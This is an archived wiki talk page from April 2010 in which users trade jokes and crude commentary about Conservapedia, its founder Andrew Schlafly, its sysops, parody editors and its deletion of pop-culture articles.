contradict the actual implementation (in Python 3, Py_SetProgramName expects a wchar_t*, not a char*), which leads to compiler errors. To fix them, ugly wchar_t to char conversions are needed. Also, I was hoping Python 3.3 had finally switched from wchar_t to char and UTF-8; at least that's how I understood PEP 393. see also: => Are the docs wrong (which I hope they are not; the example is straightforward and simple-stupid with a char*), or is CPython wrong?

You were misinterpreting PEP 393 - it is only about the representation of string objects, and doesn't affect any pre-existing API. Changing Py_SetProgramName is not possible without breaking existing code, so it could only happen in Python 4. A proper solution might be adding Py_SetProgramNameUTF8, but it could trick people into believing that argv[0] actually is UTF-8 on their system, which it might not be. Providing Py_SetProgramNameASCII might be better, but it could fail if argv[0] contains non-ASCII characters. Yet another solution could be to expose _Py_char2wchar to the developer. In any case: yes, the example is outdated, and only valid for Python 2.

This issue is why I created the issue #18395. I'd say Python should definitely change its internal string type to char*. Exposing "handy" wchar_t->char conversion functions doesn't resolve the data representation enhancement.

Jonas, why do you say that?

See also issue20466 (which has a patch for this, but I cannot speak for its effectiveness). I'd be in favor of closing that issue and this one as duplicates of #18395, and noting in #18395 that the embedding example must be updated before that issue is closed.

Martin, I think the most intuitive and easiest way of working with strings in C is just char arrays. Starting with the main() argv being char*, probably most programmers just go with char* and all the encoding just works. This is because contact with encoding is only needed for the user input software (xorg, keyboard input) and user output (-> your terminal emulator, the gui, ...). No matter what stuff your program receives, the encoding only matters for the actual output display software to select the correct visual representation. Requiring a conversion to wide chars just increases the interface complexity and adds really unneeded data transformations that are completely obsolete with UTF-8.

What I'd really like to see in CPython is that the internal storage (and the way it's exposed in the C-API) is just raw bytes (=> char*). This allows super-easy integration in C projects that probably all just use char as their string type (see the doc example mentioned earlier). PEP 393 states: "(..) the specification chooses UTF-8 as the recommended way of exposing strings to C code." And for that, I think using char instead of wchar_t is a better solution for interface developers.

> What I'd really like to see in CPython is that the internal storage (and the way it's exposed in the C-API) is just raw bytes (=> char*).

Python is portable, we care about Windows. On Windows, wchar_t* is the native type for strings (ex: command line, environment variables).
New changeset 94d0e842b9ea by Victor Stinner in branch 'default':
Issue #18395, #22108: Update embedded Python examples to decode correctly

I updated the embedding and extending examples but I didn't try them. @Jonas: Can you please try the updated examples?

Indeed, that should do it, thanks. I still pledge for Python 4 always using char* internally to make this conversion obsolete ;) (except for Windows)

> I still pledge for Python 4 always using char* internally to make this conversion obsolete ;) (except for Windows)

I don't understand your proposition. We try to have duplicate functions for char* and wchar_t*.

Jonas: Python's string type is a Unicode character type, unlike C's (which is wishy-washy when it comes to characters outside of the "basic execution character set"). So just declaring that all APIs take UTF-8 will *not* allow for easy integration with other C code; instead, it will be the source of moji-bake.

In any case, this issue appears to be resolved now; thanks for the patch.
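For reference, a sketch of roughly what the corrected embedding example looks like after this kind of fix; Py_DecodeLocale is the conversion helper that became public API in Python 3.5, so older 3.x code used _Py_char2wchar or a manual mbstowcs conversion instead:

#include <Python.h>

int main(int argc, char *argv[])
{
    wchar_t *program = Py_DecodeLocale(argv[0], NULL);
    if (program == NULL) {
        fprintf(stderr, "Fatal error: cannot decode argv[0]\n");
        exit(1);
    }
    Py_SetProgramName(program);  /* optional but recommended */
    Py_Initialize();
    PyRun_SimpleString("from time import time,ctime\n"
                       "print('Today is', ctime(time()))\n");
    Py_Finalize();
    PyMem_RawFree(program);
    return 0;
}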
https://bugs.python.org/issue22108
CC-MAIN-2019-39
refinedweb
751
63.29
As part of our face detection algorithm, we will reject cat faces that intersect with human faces. The reason is that the cat face cascade produces more false positives than the human face cascade. Thus, if a region is detected as both a human face and cat face, it is probably a human face in reality. To help us check for intersections between face rectangles, let's write a utility function, intersects. Declare the function in a new header file, GeomUtils.h, with the following code:

#ifndef GEOM_UTILS_H
#define GEOM_UTILS_H

#include <opencv2/core.hpp>

namespace GeomUtils {
  bool intersects(const cv::Rect &rect0, const cv::Rect &rect1);
}

#endif // !GEOM_UTILS_H

Two rectangles intersect if (and only if) a corner ...
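The book's own implementation is cut off above, but a hedged sketch of one way to write the function (cv::Rect already provides an intersection operator, so the body is a one-liner) would be:

// GeomUtils.cpp -- illustrative sketch, not necessarily the book's exact code
#include "GeomUtils.h"

namespace GeomUtils {

bool intersects(const cv::Rect &rect0, const cv::Rect &rect1) {
    // operator& yields the overlap rectangle; its area is zero iff there is no intersection
    return (rect0 & rect1).area() > 0;
}

} // namespace GeomUtils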
https://www.oreilly.com/library/view/ios-application-development/9781785289491/ch04s07.html
CC-MAIN-2019-09
refinedweb
121
50.12
I would rather like to have something akin to Pascal's or VB's 'with', e.g.,

with self:
    bla1, bla2 ...

Grtz,
Giorgi

Fernando Pérez wrote:
> I'm curious as to why 'self' was chosen instead of the shorter 'my' for
> naming the instance passed to methods.
>
> def meth(my,x,y,z):
>     ...
>     my.x=1
>     my.y=2
>
> is IMHO even more naturally readable than
>
> def meth(self,x,y,z):
>     ...
>     self.x=1
>     self.y=1
>
> and saves typing two characters every time (not negligible considering how
> many times you type self!).
>
> In my code I respect the 'self' convention simply because I don't like
> breaking well-accepted conventions unless there's a truly compelling reason
> to do so. But lately I've ended up using the following little function a lot:
>
> def setattr_list(obj,alist,nspace):
>     """Set a list of attributes for an object taken from a namespace.
>
>     setattr_list(obj,alist,nspace) -> sets in obj all the attributes listed in
>     alist with their values taken from nspace, which must be a dict (something
>     like locals() will often do).
>
>     Note that alist can be given as a string, which will be automatically
>     split into a list on whitespace."""
>
>     if type(alist) is types.StringType:
>         alist = alist.split()
>     for attr in alist:
>         val = eval(attr,nspace)
>         setattr(obj,attr,val)
>
> in the following manner:
>
> def meth(self,...):
>     x=1
>     y=2
>     ...
>
>     setattr_list(self,'x y z....',locals())
>
> because I hate the extra typing. I think with a shorter, leaner 'my' I
> wouldn't do this and the code would be overall clearer.
>
> Any comments on the history of self's choice?
>
> And on using shorter conventions like 'my'? (I won't go as far as using
> simply 's', single letter names should only be used for simple counters IMO).
>
> Anyway, just curious before going to bed :)
>
> Cheers,
>
> f
https://mail.python.org/pipermail/python-list/2002-January/144131.html
CC-MAIN-2020-24
refinedweb
310
65.93
30 March 2010 16:38 [Source: ICIS news]

SAN ANTONIO, Texas (ICIS news)--April contracts for European bisphenol A (BPA) are expected to move up significantly on the back of restricted availability, firming demand and higher feedstock costs, a trader said on Tuesday.

Speaking from the sidelines of the International Petrochemical Conference (IPC), the trader said that strong demand for polycarbonate (PC) had seen many producers' captive demand rise, leaving less BPA available in the European market.

"Customers are desperately looking for additional volumes," said the trader. "The price does not matter at this stage. We are seeing spot prices now at around €1,600/tonne ($2,162/tonne), but there is no cargo."

Delayed restarts and shutdowns in Asia have also limited imports into Europe.

"There is also pressure on BPA coming from higher benzene and phenol prices," the trader added. "The tightness is being felt throughout the chain. BPA sellers are looking for phenol and they cannot get it. Acetone prices are also moving up like crazy."

The trader said that April contracts were now largely done, with €1,450/tonne as a minimum price. Many players were already looking to secure volumes for May, the trader added. March BPA prices were assessed at €1,270-1,350/tonne FD (free delivered) NWE (northwest Europe).

"The current situation for BPA will last until June," said the trader. "Hexion will be back up by then, and the market could smoothen."

However, Hexion started its planned turnaround on Wednesday 24 March. A company source said that the 160,000 tonne/year plant would be down until early May.

Hosted by the National Petrochemical & Refiners Association (NPRA), the IPC continues through Tuesday.
http://www.icis.com/Articles/2010/03/30/9347151/npra-10-april-europe-bpa-to-firm-on-tight-supply-strong-demand.html
CC-MAIN-2015-22
refinedweb
281
64.1
Logistic Regression

Reading time: 20 minutes | Coding time: 5 minutes

Logistic Regression is an efficient regression algorithm that aims to predict categorical values, often binary. It is widely used in:

- the medical field, to classify sick and healthy individuals;
- areas that need to determine a client's risk, such as insurance and financial companies.

In statistics, the logistic model is a widely used statistical model that, in its basic form, uses a logistic function to model a binary dependent variable.

We encounter a lot of problems in today's world that involve categorical data. One such widely popular example is right in your inbox. Out of all the emails, a classification model can classify each email as either spam, or not spam. In such algorithms, there is a target variable, which is binary, for binary classification problems. This implies that the target variable (Y) can be thought of as either 1 or 0. An email is always going to be either spam (Y=1) or not spam (Y=0). Such problems are called binary classification problems. Classification algorithms can also be applied to Multi-Class Classification problems, where the target variable can have more than two different categories.

Need for logistic regression

Let's assume a simple problem, with our input feature (X) on the X axis and the target variable (Y) on the Y axis. We need to train a model with the dataset as given. Now, this is a fairly simple regression problem, and can be easily fitted by a linear regression line as shown here.

Now, let's take a different dataset, with the points distributed in such a way that they seem to form two categories, Y=0 and Y=1. In such cases, it becomes difficult to fit a good regression model. This is because we need a model that can output values that lie between 0 and 1. A regression line will incorporate values even less than 0 and greater than 1. This does not logically make sense. Regression also changes drastically to accommodate outliers in our dataset. That change, due to one or two outliers, may affect the predictions on all the other points. Also, a regression line will have a high loss function, as it is not passing close to all the points. Hence, we need an algorithm that:

1. is non-linear, so as to fit all the points in such a way that they seem to belong to the decision boundary;
2. is restricted between 0 and 1, as our output target variable lies only between 0 and 1;
3. is robust to the presence of outliers.

Logistic Regression is very useful here, as it uses a sigmoid function in order to calculate the probabilities of each point lying in either of the 2 classes.

Sigmoid function

In the previous section, we talked about logistic regression solving a lot of issues by using a 'sigmoid' function. A sigmoid function is written as: Y = 1 / (1 + e^(-x)). We can immediately notice from the definition of the function that no matter what the value of x is, Y will be between 0 and 1. This is a very important property of the sigmoid function for logistic regression. The use of a sigmoid function also helps in fitting a better model because it is non-linear, so it can have a gradual curve, thus fitting categorical data better, as we saw in the above example.
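As a quick illustration (a minimal sketch using NumPy, not code from the original article), the sigmoid squashes any real input into the open interval (0, 1):

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

print(sigmoid(-10), sigmoid(0), sigmoid(10))   # roughly 0.000045, 0.5, 0.999955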
Logistic Regression equation

We realized earlier that logistic regression calculates the probabilities of a point lying in either class, and not the fixed result that it will lie in one of the classes. Therefore, the output prediction (Y) will be expressed as a probability P. This idea works well partly because the sigmoid function outputs a value of Y that is strictly between 0 and 1, and the same restriction applies to a probability: the probability of anything must lie between 0 and 1.

Logistic Regression can be understood by the equation given below, where the LHS represents the 'logit' function:

log(P / (1 - P)) = B0 + B1*X1 + B2*X2 + ... + Bk*Xk

This equation is basically another representation of Y = sigmoid(theta), which is how we usually think of logistic regression. It is important to note here that the logit equation and the sigmoid-form equation are equivalent and derivable from each other. Here,

- Y = the target variable
- theta = the combination of input features, theta = B0 + B1*X1 + B2*X2 + ... + Bk*Xk
- B0, B1 ... Bk are the parameters to be trained
- X1, X2 ... Xk are the input features of the model

Advantages

- Easy to handle categorical independent variables;
- Provides results in terms of probability;
- Ease of classification of individuals into categories;
- Requires a small number of assumptions;
- High degree of reliability.

Code

Applying logistic regression to a dataset in Python is made really simple by using the LogisticRegression class present in the scikit-learn library. This, like most other Machine Learning algorithms, follows a 4-step approach to building the model.

STEP 1: Import the model we need:

from sklearn.linear_model import LogisticRegression

STEP 2: Define the model: create an instance of the class

model = LogisticRegression()

STEP 3: Train the model: fit input features (X) and target variable (Y)

model.fit(x_train, y_train)

STEP 4: Make predictions based on the model: use test input features to predict values

y_pred = model.predict(x_test)
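Putting the four steps together, a self-contained sketch (the synthetic data and variable names here are made up purely for illustration; any labelled binary dataset would do):

import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 2))               # two input features
y = (X[:, 0] + X[:, 1] > 0).astype(int)     # binary target variable

x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)

model = LogisticRegression()
model.fit(x_train, y_train)

y_pred = model.predict(x_test)              # predicted class labels (0 or 1)
probs = model.predict_proba(x_test)         # per-class probabilities from the sigmoid
print(model.score(x_test, y_test))          # accuracy on the held-out set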
https://iq.opengenus.org/logistic-regression/
CC-MAIN-2021-17
refinedweb
919
50.67
I need to add two procedures: (1) one called 'terms' (called by the main program) whose job is to display up to the first 10 terms in a sequence that starts with the value that it is passed (in $a0), and (2) a function called 'rev' that will be called by the procedure 'terms'; this function will actually calculate and return (in $v0) the reverse of the current term that is passed to it (in $a0).

Driver:

main:   la   $a0, intro        # print intro
        li   $v0, 4
        syscall
loop:   la   $a0, req          # request value of n
        li   $v0, 4
        syscall
        li   $v0, 5            # read value of n
        syscall
        ble  $v0, $zero, out   # if n is not positive, exit
        move $a0, $v0          # set parameter for terms procedure
        jal  terms             # call terms procedure
        j    loop              # branch back for next value of n
out:    la   $a0, adios        # display closing
        li   $v0, 4
        syscall
        li   $v0, 10           # exit from the program
        syscall

        .data
intro:  .asciiz "Welcome to the Square1 tester!"
req:    .asciiz "\nEnter an integer (zero or negative to exit): "
adios:  .asciiz "Come back soon!\n"
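For reference, a hedged sketch of what the 'rev' helper could look like, using MARS/SPIM pseudo-instructions (rem, mul and div with an immediate operand) and assuming the term passed in $a0 is non-negative; this is one possible approach, not necessarily the intended solution:

rev:      move $v0, $zero          # reversed value starts at 0
rev_loop: beqz $a0, rev_done       # stop when no digits remain
          rem  $t0, $a0, 10        # t0 = last decimal digit of the term
          mul  $v0, $v0, 10        # shift the reversed value left one decimal place
          add  $v0, $v0, $t0       # append the digit
          div  $a0, $a0, 10        # drop the last digit from the term
          j    rev_loop
rev_done: jr   $ra                 # reversed term is returned in $v0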
http://www.chegg.com/homework-help/questions-and-answers/need-add-two-procedures-1-one-called-terms-called-main-program-whose-job-display-first-10--q3692738
CC-MAIN-2015-35
refinedweb
181
51.18
URLConnection URL

Summary: In this "URLConnection URL" tutorial, you will learn how to read a file with the URLConnection class. The methods of the classes URLConnection and URL are explained with example code, explanation and screenshots.

Are You Busy – A program on ServerSocket

The developer can easily know which port number on the server is busy so that he can connect to a port number which is not busy. We know from earlier that port numbers should be within 0 to 65,535 (both inclusive).

ServerSocket sersock = new ServerSocket(i);

The job of java.net.ServerSocket is to bind the connection on the specified port number passed as a parameter. This parameter is passed by the client system while requesting the connection to the server. Binding means the port number given to the client will not be given to another client until the first client disconnects. In client-server communication, it is the job of the server to bind the connection. The server uses the ServerSocket class for it. To bind the connection, the server uses the bind() method of ServerSocket. In this program, it is not used as we are not actually binding the connection; the program is simply meant to find out whether the port is busy or not. In later programs, we use the bind() method as well.

sersock.close();

When the client disconnects, the server calls the close() method. When the ServerSocket is closed, the port number on which the connection was bound earlier is released. Now, this port number can be given by the server to another client.

Practicing the Methods of URL

We know from earlier that a system in the network requires an address. This unique address, in networking terms, is known as a URI (Uniform Resource Identifier). As the name indicates, it is an identifier or pointer to a system containing some resource of data. The resource (or system) can be in the same network or in a different network, including the WWW. The URI can be given in two ways – URL or URN. URL stands for Uniform Resource Locator; in its numeric form it comprises four numbers separated by three dots, like 125.252.226.27 (an IP address). URN stands for Uniform Resource Name, which is just a name like rediff.com. You know from earlier that if the name is given, it is exchanged for the numbered address and then the connection is established. Names are given to remember the systems easily (it is difficult to remember a 12-digit number). The following list gives a few examples of URNs.

The complete URL can be divided into 5 parts. For example, a URL beginning with http:// can be divided as follows. If any part is omitted in the URL, the network assumes it due to standard conventions of networking.

- http – the protocol used in the communication
- – the name of the system to which the client is to be connected
- 7001 – the port number on which the service (or process) required by the client is available on the server
- examplesWebApp/roses – the path to the resource on the server; it depends on the service configuration on the server
- password=srinivas – part of the request; it represents the data passed to the server by the client. Based on this data, the server honors the client request.

Parsing URLs

The above five pieces of the URL, like the protocol and port number, can be retrieved by using the methods of the class java.net.URL. The following program illustrates this.
The getRef() method returns the anchor part of the URL, which is the actual part of the document home.jsp required by the client.

Reading straight with URL

We know a URL points to some resource of data on a system. Using the openStream() method of the URL class, we can read the data from the resource. In the following program, the file Morals.txt available in D:\jyothi is read and printed at the DOS prompt.

URL url = new URL("");

Here, the URL points to the resource, Morals.txt, available on the local system. The URL constructor takes a string as a parameter (the resource) and throws the exception java.net.MalformedURLException, which is handled in the first catch block.

InputStream is = url.openStream();
is.read();

The openStream() method of the URL class returns an object of java.io.InputStream. This object is used to read the file Morals.txt. This method throws java.io.IOException. The read() method of InputStream reads byte by byte from the resource file, Morals.txt. This method also throws java.io.IOException.

System.out.print((char) temp);

The read() method returns an integer value and it should be converted into a character. For more on reading of this type, refer to the I/O Streams topic.

Reading with URLConnection

URLConnection is an abstract class from the java.net package. It operates on the link established by the client with the server. The programmer can use URLConnection to retrieve data about the resource (say, documents) referred to by the URL. An object of URLConnection can be used to read from or write data to the documents referred to by the URL. This class gives the programmer more flexibility of operation over the server resources than URL does. The following program uses different methods of URL and also reads from a file referred to by the URL.

URL url = new URL("");

Now the URL object url refers to the resource in the form of the file Morals.txt.

URLConnection con = url.openConnection();

The openConnection() method of the URL class returns an object of URLConnection, con. The con object points to the file Morals.txt. With the con object, we can read from or write into the file Morals.txt and also find out the particulars of the URL address. The methods of the URLConnection class, like getURL(), getDate(), getContentType(), getExpiration() and getLastModified(), return the complete address referred to by the URL object, the sending date of the resource referred to by the URL, the type of the content existing in the file (like HTML, plain text or image etc.), the expiration date of the resource (if the resource is a piece of software) and the date of creation of the file Morals.txt or the latest modification date, respectively.

InputStream istream = con.getInputStream();

The URLConnection class includes two methods, getInputStream() and getOutputStream(), that return an object of InputStream and OutputStream respectively. These objects are useful to read from the resource or write to the resource.
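A self-contained sketch along the same lines (the URL below is only a placeholder, since the original article's file URL was stripped; any readable http:// or file:// URL will do):

// URLConnectionDemo.java - hedged sketch, not the article's original program
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;

public class URLConnectionDemo {
    public static void main(String[] args) throws Exception {
        URL url = new URL("https://example.com/");   // placeholder resource
        URLConnection con = url.openConnection();

        // A few of the informational methods discussed above
        System.out.println("URL          : " + con.getURL());
        System.out.println("Content type : " + con.getContentType());
        System.out.println("Last modified: " + con.getLastModified());

        // Read the resource line by line through the connection's InputStream
        try (BufferedReader reader = new BufferedReader(
                new InputStreamReader(con.getInputStream()))) {
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
        }
    }
}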
https://way2java.com/networking/urlconnection-url/
CC-MAIN-2017-39
refinedweb
1,065
65.12